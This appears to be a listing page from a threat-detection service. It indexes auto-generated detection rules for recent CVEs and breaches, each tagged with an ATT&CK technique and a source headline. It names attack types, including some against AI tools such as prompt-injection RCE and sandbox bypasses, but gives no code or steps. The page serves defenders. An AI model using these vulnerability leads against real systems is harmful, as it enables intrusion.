Auto-generated from EspoCRM Critical Path Traversal: Admin Access Leads to Se...
🛡️ 2 more rules via /detect
iOS Notification Data Persistence Anomaly
Breach IntelT1083 — Discovery
Auto-generated from Apple Patches iOS Notification Data Retention Flaw
🛡️ 2 more rules via /detect
CVE-2026-34065 - Nimiq Node Panic via Malformed BLS Key
🌐 NVDT1190 — Initial Access
Auto-generated from Nimiq Primitives Node Panic via Malformed BLS Key
Nimiq network-libp2p Crash Vulnerability (CVE-2026-34063)
🌐 NVDT1499 — Impact
Auto-generated from Nimiq network-libp2p Crash Vulnerability: CVE-2026-34063
Nimiq SkipBlockProof Verification with Out-of-Range Indices - CVE-2026-33471
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Nimiq Block Vulnerability: SkipBlockProof Bypass
🛡️ 1 more rules via /detect
Exploitation Attempt — D-Link
Breach Intelvulnerability — event-type
Auto-generated from Mirai Botnet Exploits End-of-Life D-Link Routers via RCE
CVE-2026-41468 - AngularJS Sandbox Escape via Template Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Beghelli SicuroWeb: EOL AngularJS Exposes Operators to Se...
🛡️ 2 more rules via /detect
CVE-2026-34415 - Xerte Online Toolkits PHP File Upload via elFinder
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE in Xerte Online Toolkits: Incomplete Input V...
🛡️ 2 more rules via /detect
CVE-2026-34414 - Xerte Online Toolkits Path Traversal Rename
🌐 NVDT1190 — Initial Access
Auto-generated from Xerte Online Toolkits Vulnerability: Path Traversal Risks...
🛡️ 2 more rules via /detect
CVE-2026-34413 - Xerte Online Toolkits Unauthenticated File Operations
🌐 NVDT1190 — Initial Access
Auto-generated from Xerte Online Toolkits RCE: Unauthenticated File Operations
🛡️ 2 more rules via /detect
Dell PowerProtect DD OS Remote Command Execution Attempt - CVE-2026-26354
🌐 NVDT1190 — Initial Access
Auto-generated from Dell PowerProtect DD OS Vulnerability Exposes Data to Rem...
🛡️ 2 more rules via /detect
Volo Protocol Exploit - Anomalous Transaction Volume
Breach IntelT1190 — Initial Access
Auto-generated from Volo Protocol Loses $3.5 Million in Digital Assets
🛡️ 2 more rules via /detect
Malicious KICS Docker Image Pull
Breach IntelT1588 — Reconnaissance
Auto-generated from Malicious KICS Docker Images and VS Code Extensions Hijac...
🛡️ 2 more rules via /detect
Anthropic Claude Desktop Native Messaging Bridge Installation
Breach IntelT1547.001 — Persistence
Auto-generated from Anthropic Claude Desktop Implants Browser Bridge, Bypassi...
🛡️ 2 more rules via /detect
Unauthenticated JavaScript Execution via GitLab Path Traversal - CVE-2026-5816
🌐 NVDT1190 — Initial Access
Auto-generated from GitLab XSS Flaw: Unauthenticated JavaScript Execution Risk
🛡️ 1 more rules via /detect
GitLab Storybook Unauthenticated Token Exposure - CVE-2026-5262
🌐 NVDT1190 — Initial Access
Auto-generated from GitLab Vulnerability Exposes Sensitive Tokens in Storybook
🛡️ 1 more rules via /detect
GitLab GraphQL Mutation Abuse via CSRF - CVE-2026-4922
🌐 NVDT1190 — Initial Access
Auto-generated from GitLab CSRF Flaw Exposes Authenticated Users to Unauthent...
🛡️ 1 more rules via /detect
Privilege Escalation via Malicious NSS Module in Chroot - CVE-2026-35368
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Chroot Vulnerability Allows Root Privileges via Malicious...
🛡️ 2 more rules via /detect
Privilege Escalation via coreutils mkfifo TOCTOU Race Condition - CVE-2026-35352
🌐 NVDT1068 — Privilege Escalation
Auto-generated from TOCTOU Flaw in coreutils mkfifo: Local Privilege Escalati...
🛡️ 2 more rules via /detect
CVE-2026-35341: uutils mkfifo permission modification on existing file
🌐 NVDT1222.001 — Privilege Escalation
Auto-generated from uutils mkfifo Flaw Exposes Sensitive Files to Permission ...
🛡️ 2 more rules via /detect
CVE-2026-35338: chmod Bypass with Path Traversal to Modify Root
🌐 NVDT1562.001 — Defense Evasion
Auto-generated from chmod Bypass Threatens System Integrity: CVE-2026-35338 D...
🛡️ 2 more rules via /detect
ELBA5 RCE via xp_cmdshell - CVE-2018-25272
🌐 NVDT1059.003 — Execution
Auto-generated from ELBA5 RCE Flaw Grants SYSTEM Access Via Database
🛡️ 2 more rules via /detect
CVE-2018-25270 - ThinkPHP RCE via Routing Parameter
🌐 NVDT1190 — Initial Access
Auto-generated from ThinkPHP RCE Bug: Unauthenticated Attackers Exploit Criti...
🛡️ 2 more rules via /detect
CVE-2018-25268 - LanSpy Local Buffer Overflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from LanSpy 2.0.1.159 Vulnerability: Local Buffer Overflow Lea...
🛡️ 1 more rules via /detect
MAGIX Music Editor Local Code Execution via Buffer Overflow - CVE-2018-25260
🌐 NVDT1218 — Execution
Auto-generated from MAGIX Music Editor Exploit: Local Code Execution via Buff...
🛡️ 2 more rules via /detect
CVE-2018-25259 - TSM 3.1 Buffer Overflow - calc.exe Execution
🌐 NVDT1204.002 — Execution
Auto-generated from Old Vulnerability, New Headache: TSM 3.1 Buffer Overflow ...
🛡️ 2 more rules via /detect
GoGra Backdoor - Microsoft Graph API C2 Communication
Breach IntelT1071.001 — Command and Control
Auto-generated from Harvester's GoGra Backdoor Exploits Microsoft Graph API f...
🛡️ 2 more rules via /detect
CVE-2026-6859 - InstructLab Remote Code Execution via Malicious HuggingFace Model
🌐 NVDT1059.001 — Execution
Auto-generated from InstructLab Vulnerability: Remote Code Execution via Mali...
🛡️ 2 more rules via /detect
CVE-2026-41651 PackageKit Local Privilege Escalation via TOCTOU
🌐 NVDT1068 — Privilege Escalation
Auto-generated from PackageKit Vulnerability Allows Local Privilege Escalatio...
🛡️ 2 more rules via /detect
CVE-2026-33608 - Bind Backend Configuration Exploit Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from NVD Flags High-Severity Vulnerability: Bind Backend Confi...
CVE-2026-33593 - DNSCrypt Crafted Query Denial of Service
🌐 NVDT1190 — Initial Access
Auto-generated from DNSCrypt Vulnerability Allows Remote Crash via Crafted Qu...
CVE-2026-6857 - Unsafe Deserialization via ProtoStream Remote Aggregation
🌐 NVDT1505.003 — Initial Access
Auto-generated from Critical Deserialization Flaw in camel-infinispan Allows RCE
🛡️ 2 more rules via /detect
InstructLab Path Traversal - Suspicious Logs Directory Manipulation - CVE-2026-6855
🌐 NVDT1574.002 — Persistence
Auto-generated from InstructLab Path Traversal Flaw Exposes Local File System
🛡️ 2 more rules via /detect
Supply Chain Compromise: Malicious xinference Library Installation
Breach IntelT1190 — Initial Access
Auto-generated from Python Library xinference Compromised, TeamPCP Denies Inv...
🛡️ 2 more rules via /detect
npm Supply Chain Attack - Malicious Package Publish
Breach IntelT1190 — Initial Access
Auto-generated from New npm Supply Chain Attack Steals Developer Auth Tokens
🛡️ 2 more rules via /detect
Data Staging for Exfiltration
Breach Intelespionage — event-type
Auto-generated from Lotus Wiper Targets Venezuelan Energy Sector
Moltbook Breach - Exposed OpenAI API Keys in Private Messages
Breach IntelT1537 — Impact
Auto-generated from Moltbook Breach Exposes AI Agent API Tokens and OpenAI Keys
🛡️ 2 more rules via /detect
AirSnitch Wi-Fi Encryption Bypass Attempt
Breach IntelT1190 — Initial Access
Auto-generated from AirSnitch: New Attack Bypasses WPA2/3 Wi-Fi Encryption
🛡️ 2 more rules via /detect
Google Antigravity Vulnerability Exploitation Attempt
Breach IntelT1190 — Initial Access
Auto-generated from Google Antigravity Vulnerability Exploited for Malware Di...
🛡️ 2 more rules via /detect
CVE-2026-6846 - Binutils XCOFF Heap Overflow via Linking
🌐 NVDT1204.002 — Execution
Auto-generated from Binutils Heap Overflow: Local Attackers Gain Code Executi...
🛡️ 2 more rules via /detect
CVE-2026-6235 WordPress Sendmachine Plugin Authorization Bypass
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Plugin Flaw Lets Attackers Hijack Site Emails
🛡️ 1 more rules via /detect
WordPress HTTP Headers Plugin RCE via Arbitrary File Write - CVE-2026-4132
🌐 NVDT1068 — Privilege Escalation
Auto-generated from WordPress HTTP Headers Plugin Flaw Opens Door to RCE
🛡️ 2 more rules via /detect
WordPress Create DB Tables Plugin - Arbitrary Table Deletion Attempt - CVE-2026-4119
🌐 NVDT1578.002 — Impact
Auto-generated from WordPress Plugin Vulnerability Lets Subscribers Wreck Dat...
🛡️ 2 more rules via /detect
Critical Firefox Update - Use-After-Free Vulnerability
Breach IntelT1190 — Initial Access
Auto-generated from AI Unearths Hundreds of Firefox Vulnerabilities, Promptin...
🛡️ 2 more rules via /detect
Oracle WebLogic Unauthenticated RCE via Deserialization
Breach IntelT1190 — Initial Access
Auto-generated from Oracle's April CPU: 450 Patches, Over 300 Remote, Unauthe...
🛡️ 2 more rules via /detect
Telerik UI AJAX RadFilter Deserialization RCE Attempt - CVE-2026-6023
🌐 NVDT1190 — Initial Access
Auto-generated from Telerik UI for AJAX RadFilter Vulnerable to RCE via Deser...
🛡️ 2 more rules via /detect
CVE-2026-6022 - Telerik UI RadAsyncUpload Chunk Reassembly Disk Exhaustion
🌐 NVDT1499 — Impact
Auto-generated from Telerik UI Vulnerability Allows Disk Space Exhaustion Att...
🛡️ 1 more rules via /detect
Exploit ASP.NET Core Data Protection API Forged Cookie
Breach IntelT1190 — Initial Access
Auto-generated from Microsoft Rushes Patches for Critical ASP.NET Core Privil...
🛡️ 2 more rules via /detect
Phishing Campaign Impersonating Israeli Tax Authority via SMS
Breach IntelT1566.001 — Initial Access
Auto-generated from Tax Authority Phishing Campaign Targets Israelis with Fak...
🛡️ 2 more rules via /detect
MS SharePoint Spoofing Vulnerability Exploitation
Breach IntelT1190 — Initial Access
Auto-generated from Unpatched SharePoint Servers Remain Ripe for Spoofing Att...
🛡️ 2 more rules via /detect
CVE-2026-22754 - Spring Security Authorization Bypass via Incorrect Servlet Path Matching
🌐 NVDT1190 — Initial Access
Auto-generated from Spring Security Authorization Bypass: High Severity Vulne...
🛡️ 1 more rules via /detect
Spring Security Path Pattern Bypass - CVE-2026-22753
🌐 NVDT1190 — Initial Access
Auto-generated from Spring Security Flaw Bypasses Auth, Authorization
🛡️ 1 more rules via /detect
CVE-2026-41064: WWBN AVideo Unsanitized file_get_contents/curl RCE
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE in WWBN AVideo: Incomplete Patch Leaves Open...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-41059
🌐 NVDT1190 — Initial Access
Auto-generated from OAuth2 Proxy Bypass: Fragment Handling Exposes Protected ...
🛡️ 2 more rules via /detect
CVE-2026-40575 - OAuth2 Proxy Auth Bypass via X-Forwarded-Uri
🌐 NVDT1190 — Initial Access
Auto-generated from Critical OAuth2 Proxy Auth Bypass: CVE-2026-40575
🛡️ 1 more rules via /detect
France Titres Data Breach - Data Offered for Sale
Breach IntelT1119 — Collection
Auto-generated from French Government Agency Confirms Data Breach, Citizen Da...
🛡️ 2 more rules via /detect
CVE-2026-6823 - OpenHarness Default Config Remote Channel Access
🌐 NVDT1190 — Initial Access
Auto-generated from HKUDS OpenHarness Default Config Exposes Systems (CVE-202...
🛡️ 2 more rules via /detect
AVideo objects/configurationUpdate.json.php POST Request - CVE-2026-40925
🌐 NVDT1190 — Initial Access
Auto-generated from Critical AVideo XSS Vulnerability Exposes Admin Settings
🛡️ 2 more rules via /detect
AVideo YPTSocket Plugin Unauthenticated RCE via eval() - CVE-2026-40911
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE in AVideo YPTSocket Plugin: Unauthenticated ...
🛡️ 2 more rules via /detect
CVE-2026-40906 - ElectricSQL Order By SQL Injection
🌐 NVDT1190 — Initial Access
Auto-generated from CRITICAL SQLi in ElectricSQL: Full Database Compromise
🛡️ 2 more rules via /detect
CVE-2026-40905 - LinkAce Password Reset Host Header Poisoning
🌐 NVDT1078.004 — Initial Access
Auto-generated from LinkAce Password Reset Flaw: Account Takeover Risk
🛡️ 2 more rules via /detect
CVE-2026-34309 - PeopleSoft Unauthenticated Data Access via HTTP
🌐 NVDT1190 — Initial Access
Auto-generated from PeopleSoft Security Flaw: Critical Data at Risk via HTTP
🛡️ 2 more rules via /detect
Oracle HTTP Server CVE-2026-34291 Unauthenticated RCE Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Oracle HTTP Server CVE-2026-34291: High-Severity RCE Risk
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-34287
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Oracle Identity Manager Flaw: Unauthenticated Da...
🛡️ 2 more rules via /detect
CVE-2026-34286 - Unauthenticated Oracle Identity Manager Connector Data Compromise
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Oracle Identity Manager Flaw: Unauthenticated Da...
🛡️ 2 more rules via /detect
Unauthenticated Access to Oracle Identity Manager Connector Data - CVE-2026-34285
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Oracle Identity Manager Flaw: Unauthenticated Da...
🛡️ 2 more rules via /detect
CVE-2026-34279 - Oracle Enterprise Manager RCE via Event Management
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE in Oracle Enterprise Manager Base Platform (...
🛡️ 2 more rules via /detect
CVE-2026-33519 - Esri Portal Incorrect Authorization Access
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Esri Portal Vulnerability: Incorrect Authorizati...
🛡️ 1 more rules via /detect
Esri Portal for ArcGIS Privilege Escalation via Developer Credentials - CVE-2026-33518
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from Critical Privilege Escalation in Esri Portal for ArcGIS
🛡️ 1 more rules via /detect
CVE-2026-21997 - Oracle Empirica Signal Unauthorized Data Modification Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Oracle Empirica Signal Flaw: Data Integrity at Risk
🛡️ 2 more rules via /detect
CVE-2026-6819 - OpenHarness Unauthorized Plugin Installation
🌐 NVDT1190 — Initial Access
Auto-generated from HKUDS OpenHarness Vulnerability Exposes Plugin Management...
🛡️ 3 more rules via /detect
CVE-2026-40909 - WWBN AVideo Locale Save RCE via Path Traversal
🌐 NVDT1190 — Initial Access
Auto-generated from WWBN AVideo RCE: Path Traversal Exposes Servers to Arbitr...
🛡️ 2 more rules via /detect
CVE-2026-40903 - goshs Server ArtiPACKED GitHub Token Leakage
🌐 NVDT1537 — Defense Evasion
Auto-generated from Critical ArtiPACKED Vulnerability in goshs Server Leaks G...
🛡️ 2 more rules via /detect
CVE-2026-40890: Go Markdown Parser Out-of-Bounds Read via Malformed Input
🌐 NVDT1190 — Initial Access
Auto-generated from High-Severity Go Markdown Parser Bug: CVE-2026-40890
🛡️ 2 more rules via /detect
CVE-2026-40887: Vendure Unauthenticated SQL Injection via Shop API
🌐 NVDT1190 — Initial Access
Auto-generated from Critical SQLi in Vendure: Unauthenticated Remote Code Exe...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-40884
🌐 NVDT1190 — Initial Access
Auto-generated from Critical SFTP Auth Bypass in goshs SimpleHTTPServer
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-40879
🌐 NVDT1190 — Initial Access
Auto-generated from Nest.js DoS via Malformed JSON: CVE-2026-40879
🛡️ 2 more rules via /detect
CVE-2026-40871 Mailcow API SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Mailcow SQLi: Second-Order Vulnerability in Quarantine No...
🛡️ 2 more rules via /detect
Decidim API Unauthenticated Access to Commentable Resources - CVE-2026-40870
🌐 NVDT1190 — Initial Access
Auto-generated from Decidim API Flaw Exposes Sensitive Participatory Data
🛡️ 2 more rules via /detect
CVE-2026-40869 - Decidim Unauthorized Amendment Acceptance
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from Decidim Flaw Allows Unauthorized Amendment Acceptance
🛡️ 1 more rules via /detect
CVE-2026-40372 ASP.NET Core Signature Bypass Privilege Escalation
🌐 NVDT1190 — Initial Access
Auto-generated from Critical ASP.NET Core Flaw: Privilege Escalation via Sign...
🛡️ 2 more rules via /detect
CVE-2026-40868: Kyverno apiCall Service Account Token Leak to External Endpoint
🌐 NVDT1538 — Exfiltration
Auto-generated from Kyverno Policy Engine Flaw Leaks Service Account Tokens
🛡️ 2 more rules via /detect
CVE-2026-40613 - Coturn ARM64 Crash via Crafted STUN Message
🌐 NVDT1190 — Initial Access
Auto-generated from Coturn ARM64 Crash: Unauthenticated DoS via Crafted STUN ...
Windows Defender Command Execution via Malicious Update
Breach IntelT1218 — Defense Evasion
Auto-generated from Exploits Weaponize Windows Defender Against Its Users
🛡️ 2 more rules via /detect
FreeScout Unrestricted File Write via ZIP Upload - CVE-2026-41193
🌐 NVDT1190 — Initial Access
Auto-generated from FreeScout Vulnerability: Unrestricted File Write via ZIP ...
🛡️ 2 more rules via /detect
FreeScout Attachment Deletion via Replayed IDs - CVE-2026-41192
🌐 NVDT1083 — Discovery
Auto-generated from FreeScout Attachment Flaw Allows Data Deletion
🛡️ 2 more rules via /detect
CVE-2026-40611 - Lego ACME Client Path Traversal Arbitrary File Write
🌐 NVDT1505.003 — Defense Evasion
Auto-generated from Lego ACME Client Vulnerable to Path Traversal, Arbitrary ...
🛡️ 2 more rules via /detect
BlueprintUE Password Change Without Current Password - CVE-2026-40588
🌐 NVDT1078.004 — Credential Access
Auto-generated from BlueprintUE Vulnerability Allows Permanent Account Takeover
🛡️ 1 more rules via /detect
CVE-2026-5652 - Crafty Controller User API IODR - Free Tier
🌐 NVDT1078 — Defense Evasion
Auto-generated from Critical IODR Vulnerability in Crafty Controller Puts Ser...
🛡️ 2 more rules via /detect
FreeScout Mailbox Chat Setting Change - CVE-2026-41191
🌐 NVDT1190 — Initial Access
Auto-generated from FreeScout Vulnerability Allows Unauthorized Chat Setting ...
🛡️ 1 more rules via /detect
FreeScout Save Draft Vulnerability (CVE-2026-41190)
🌐 NVDT1190 — Initial Access
Auto-generated from FreeScout Help Desk Vulnerability Exposes Hidden Conversa...
🛡️ 1 more rules via /detect
FreeScout Unauthorized Thread Editing - CVE-2026-41189
🌐 NVDT1190 — Initial Access
Auto-generated from FreeScout Vulnerability Lets Unauthorized Users Edit Supp...
🛡️ 1 more rules via /detect
FreeScout Phone Conversation Creation with Suspicious Customer ID - CVE-2026-40591
🌐 NVDT1190 — Initial Access
Auto-generated from FreeScout Vulnerability Allows Low-Privilege Agents to Ex...
🛡️ 2 more rules via /detect
FreeScout Customer Data Disclosure via Email Reassignment - CVE-2026-40589
🌐 NVDT1190 — Initial Access
Auto-generated from FreeScout Vulnerability Exposes Hidden Customer Data
🛡️ 2 more rules via /detect
CVE-2026-40586 - BlueprintUE Login Brute-Force Attempt
🌐 NVDT1110 — Credential Access
Auto-generated from Unreal Engine Tool's Login Flaw Exposes Developers to Bru...
🛡️ 1 more rules via /detect
CVE-2026-40585 - BlueprintUE Indefinite Password Reset Token Validity
🌐 NVDT1190 — Initial Access
Auto-generated from Unreal Engine Dev Tool Vulnerability Allows Indefinite Pa...
🛡️ 1 more rules via /detect
CVE-2026-40576 - Excel-MCP-Server Path Traversal - File Read
🌐 NVDT1190 — Initial Access
Auto-generated from Excel-MCP-Server Path Traversal: Critical Flaw Exposes Fi...
🛡️ 3 more rules via /detect
FreeScout Mass Assignment Vulnerability - Auto BCC Exfiltration - CVE-2026-40569
🌐 NVDT1190 — Initial Access
Auto-generated from FreeScout Vulnerability Allows Silent Email Exfiltration ...
🛡️ 2 more rules via /detect
Drive-by Download via Browser — CVE-2026-40568
🌐 NVDT1189 — Initial Access
Auto-generated from FreeScout XSS Flaw Allows Session Hijacking and Data Exfi...
🛡️ 2 more rules via /detect
Tekton Git Resolver API Token Exfiltration via ServerURL - CVE-2026-40161
🌐 NVDT1537 — Exfiltration
Auto-generated from Tekton Pipelines Git Resolver Leaks API Tokens
🛡️ 2 more rules via /detect
Unauthenticated Path Traversal in LogScale Cluster API — CVE-2026-40050
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Unauthenticated Path Traversal in CrowdStrike Lo...
🛡️ 1 more rules via /detect
CVE-2026-24189 - NVIDIA CUDA-Q Unauthenticated Out-of-Bounds Read
🌐 NVDT1190 — Initial Access
Auto-generated from NVIDIA CUDA-Q Vulnerability Poses DoS, Info Disclosure Risk
🛡️ 2 more rules via /detect
NVIDIA KAI Scheduler Unauthorized API Access - CVE-2026-24177
🌐 NVDT1190 — Initial Access
Auto-generated from NVIDIA KAI Scheduler Flaw: Unauthorized API Access Poses ...
🛡️ 2 more rules via /detect
BRIDGE:BREAK - Exposed Lantronix/Silex Serial-to-IP Converter Web Interface Access
Breach IntelT1190 — Initial Access
Auto-generated from BRIDGE:BREAK Flaws Plague Lantronix and Silex Serial-to-I...
🛡️ 2 more rules via /detect
Exploit - Bomgar RMM CVE-2026-1731 RCE Attempt
Breach IntelT1190 — Initial Access
Auto-generated from Bomgar RMM Exploitation: A Supply Chain Wake-Up Call
🛡️ 2 more rules via /detect
Fortra GoAnywhere MFT SFTP Brute Force via SSH Key Guessing - CVE-2026-0972
🌐 NVDT1110.004 — Credential Access
Auto-generated from Fortra GoAnywhere MFT SFTP Brute Force Vulnerability
🛡️ 2 more rules via /detect
Fortra GoAnywhere MFT SSH Key Brute Force Attempt - CVE-2025-14362
🌐 NVDT1110.004 — Credential Access
Auto-generated from Fortra GoAnywhere MFT: SSH Key Brute Force Vulnerability ...
🛡️ 2 more rules via /detect
Anthropic SDK STDIO RCE Attempt
Breach IntelT1190 — Initial Access
Auto-generated from Anthropic's STDIO Design Flaw: RCE in AI Ecosystem
🛡️ 2 more rules via /detect
Google AI Filesystem Tool RCE via Prompt Injection
Breach IntelT1059.001 — Execution
Auto-generated from Google Patches Critical RCE in AI Filesystem Tool
🛡️ 2 more rules via /detect
EU Sanctions Russian Propaganda Networks - Euromore/Pravfond Domain Access
Breach IntelT1566.002 — Initial Access
Auto-generated from EU Sanctions Russian Propaganda Networks
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-40520
🌐 NVDT1190 — Initial Access
Auto-generated from FreePBX Command Injection: Authenticated Attackers Gain H...
🛡️ 2 more rules via /detect
Suspicious Access to Vercel Customer Credentials via Third-Party AI Tool
Breach IntelT1190 — Initial Access
Auto-generated from Third-Party AI Tool Exposes Vercel Customer Credentials
🛡️ 2 more rules via /detect
Unsecured Perforce Server Access Attempt
Breach IntelT1190 — Initial Access
Auto-generated from Unsecured Perforce Servers Leak Sensitive Data from Major...
🛡️ 2 more rules via /detect
Exploitation Attempt — Progress
Breach Intelvulnerability — event-type
Auto-generated from Progress Patches Critical Flaws in MOVEit WAF, LoadMaster
CISA KEV - Cisco RVB Exploit - Initial Access
Breach IntelT1190 — Initial Access
Auto-generated from CISA Warns: Exploited Cisco, Kentico, Zimbra Flaws Demand...
🛡️ 2 more rules via /detect
Healthcare Data Exfiltration via Suspicious File Access
Breach IntelT1005 — Collection
Auto-generated from Healthcare Breaches Hit 600,000 in Illinois and Texas
🛡️ 2 more rules via /detect
Google Antigravity IDE find_by_name Command Injection
Breach IntelT1190 — Initial Access
Auto-generated from Google Antigravity IDE Flaw Led to Code Execution
🛡️ 2 more rules via /detect
CVE-2026-39467 MetaSlider Object Injection via Deserialization
🌐 NVDT1190 — Initial Access
Auto-generated from MetaSlider Vulnerability: Object Injection via Deserializ...
🛡️ 2 more rules via /detect
BlackCat Ransomware Activity - Insider Facilitation
Breach IntelT1078.004 — Defense Evasion
Auto-generated from Former Ransomware Negotiator Pleads Guilty to BlackCat At...
🛡️ 2 more rules via /detect
CVE-2026-31368: AiAssistant Privilege Bypass Attempt
🌐 NVDT1190 — Privilege Escalation
Auto-generated from CVE-2026-31368: AiAssistant Privilege Bypass Poses High Risk
🛡️ 2 more rules via /detect
KEV - PaperCut CVE-2023-27351 Improper Authentication
Breach IntelT1190 — Initial Access
Auto-generated from CISA Adds 8 Exploited Vulnerabilities to KEV Catalog
🛡️ 2 more rules via /detect
Suspicious Dark Web Data Sale Advertisement
Breach IntelT1566.002 — Initial Access
Auto-generated from Alleged EL AL Passenger Data Sale: Low Price Raises Red F...
🛡️ 2 more rules via /detect
CVE-2026-5965 NewSoftOA Unauthenticated Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Command Injection in NewSoftOA: Unauthenticated ...
🛡️ 2 more rules via /detect
FreeScout Mailbox Settings CSS Injection - CVE-2026-40497
🌐 NVDT1190 — Initial Access
Auto-generated from FreeScout CSS Injection Allows Privilege Escalation
🛡️ 2 more rules via /detect
CVE-2026-39973: Apktool Path Traversal During Decoding
🌐 NVDT1570 — Execution
Auto-generated from Apktool Path Traversal: Arbitrary File Write Leads to RCE
🛡️ 3 more rules via /detect
CVE-2026-39386 - Neko Authenticated RCE to Admin Takeover via Profile Update
🌐 NVDT1078.002 — Privilege Escalation
Auto-generated from Neko Virtual Browser: Authenticated RCE to Admin Takeover
🛡️ 2 more rules via /detect
CVE-2026-39320: Signal K Server WebSocket Subscription ReDoS Exploit Attempt
🌐 NVDT1499 — Impact
Auto-generated from Signal K Server DoS: Unauthenticated ReDoS Attack Hits Ma...
🛡️ 2 more rules via /detect
CVE-2026-41329 - OpenClaw Sandbox Bypass via Heartbeat Context Inheritance
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Critical OpenClaw Sandbox Bypass Allows Privilege Escalation
🛡️ 1 more rules via /detect
CVE-2026-41303 - OpenClaw Discord Bot Unauthorized Exec Approval
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw Discord Bot Vulnerability Allows Unauthorized Ex...
🛡️ 1 more rules via /detect
CVE-2026-41302 - OpenClaw Marketplace Plugin SSRF
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw SSRF Vulnerability Exposes Internal Resources
🛡️ 2 more rules via /detect
OpenClaw Authorization Bypass via chat.send - CVE-2026-41299
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw Authorization Bypass Puts Operator Privileges at...
🛡️ 2 more rules via /detect
CVE-2026-41297 - OpenClaw Marketplace Plugin SSRF
🌐 NVDT1190 — Initial Access
Auto-generated from OpenClaw SSRF Vulnerability Exposes Internal Resources
🛡️ 2 more rules via /detect
Privilege Escalation Attempt Detection
🌐 NVDT1068 — Privilege Escalation
Auto-generated from OpenClaw Sandbox Escape Via Time-of-Check-Time-of-Use Rac...
OpenClaw Workspace Channel Shadowing Code Execution - CVE-2026-41295
🌐 NVDT1574.002 — Execution
Auto-generated from OpenClaw Vulnerability Allows Untrusted Code Execution Be...
🛡️ 2 more rules via /detect
CVE-2026-41294 - OpenClaw Malicious .env File Loading
🌐 NVDT1574.002 — Execution
Auto-generated from OpenClaw .env Vulnerability: Local File Can Hijack Config
🛡️ 2 more rules via /detect
CVE-2026-35570 - OpenClaude Path Traversal to Sensitive File Read
🌐 NVDT1068 — Privilege Escalation
Auto-generated from OpenClaude Path Traversal Bypasses Sandbox Controls
🛡️ 2 more rules via /detect
CVE-2026-33626 - LMDeploy SSRF to Cloud Metadata Service
🌐 NVDT1190 — Initial Access
Auto-generated from LMDeploy Vulnerability Exposes LLM Servers to SSRF Attacks
🛡️ 2 more rules via /detect
CVE-2026-32613 - Spinnaker Echo SPeL JVM Access
🌐 NVDT1190 — Initial Access
Auto-generated from Critical Spinnaker Vulnerability Exposes JVM to Attackers
🛡️ 2 more rules via /detect
CVE-2026-32604 - Spinnaker Clouddriver Arbitrary Command Execution
🌐 NVDT1059.004 — Execution
Auto-generated from Critical Spinnaker Vulnerability Exposes Cloud Credentials
🛡️ 2 more rules via /detect
Vercel Breach - OAuth Token Abuse via Third-Party Integration
Breach IntelT1539 — Credential Access
Auto-generated from Vercel Breach: Stolen OAuth Tokens — New Lateral Movement...
🛡️ 2 more rules via /detect
CVE-2026-6257 - Vvveb CMS Authenticated File Rename to PHP Execution
🌐 NVDT1190 — Initial Access
Auto-generated from Vvveb CMS RCE: Authenticated Users Can Rename Files to Ex...
🛡️ 2 more rules via /detect
CVE-2026-6249 - Vvveb CMS Authenticated PHP Webshell Upload
🌐 NVDT1190 — Initial Access
Auto-generated from Vvveb CMS RCE: Authenticated Users Can Own Your Server
🛡️ 2 more rules via /detect
CVE-2026-5478 - Everest Forms Arbitrary File Read via Path Traversal
🌐 NVDT1190 — Initial Access
Auto-generated from Everest Forms Plugin Vulnerability Allows Arbitrary File ...
🛡️ 2 more rules via /detect
wpForo Arbitrary File Deletion via Custom Profile Field - CVE-2026-6248
🌐 NVDT1190 — Initial Access
Auto-generated from wpForo Plugin Flaw Allows Arbitrary File Deletion, RCE
🛡️ 2 more rules via /detect
CVE-2026-39111 - Unauthenticated SQLi in Forgot Password Email Parameter
🌐 NVDT1190 — Initial Access
Auto-generated from Unauthenticated SQLi in Apartment Visitors Management System
🛡️ 2 more rules via /detect
CVE-2026-6662: Open CORS Policy in copilot-api Token Endpoint
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6662: Open CORS Policy in copilot-api Exposes To...
🛡️ 1 more rules via /detect
CVE-2026-41445 - KissFFT Integer Overflow Heap Corruption via Crafted Dimensions
🌐 NVDT1190 — Initial Access
Auto-generated from KissFFT Integer Overflow: Heap Corruption Risk in Signal ...
🛡️ 2 more rules via /detect
CVE-2026-26943 - Dell PowerProtect Data Domain OS Command Injection
🌐 NVDT1059.004 — Execution
Auto-generated from Dell PowerProtect Data Domain OS Command Injection: Root ...
🛡️ 2 more rules via /detect
OpenMage LTS Arbitrary Code Execution via Phar Upload - CVE-2026-25524
🌐 NVDT1190 — Initial Access
Auto-generated from OpenMage LTS Vulnerability Allows Arbitrary Code Executio...
🛡️ 2 more rules via /detect
CVE-2026-24506 - Dell PowerProtect Data Domain OS Command Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Dell PowerProtect Data Domain: Root OS Command Injection
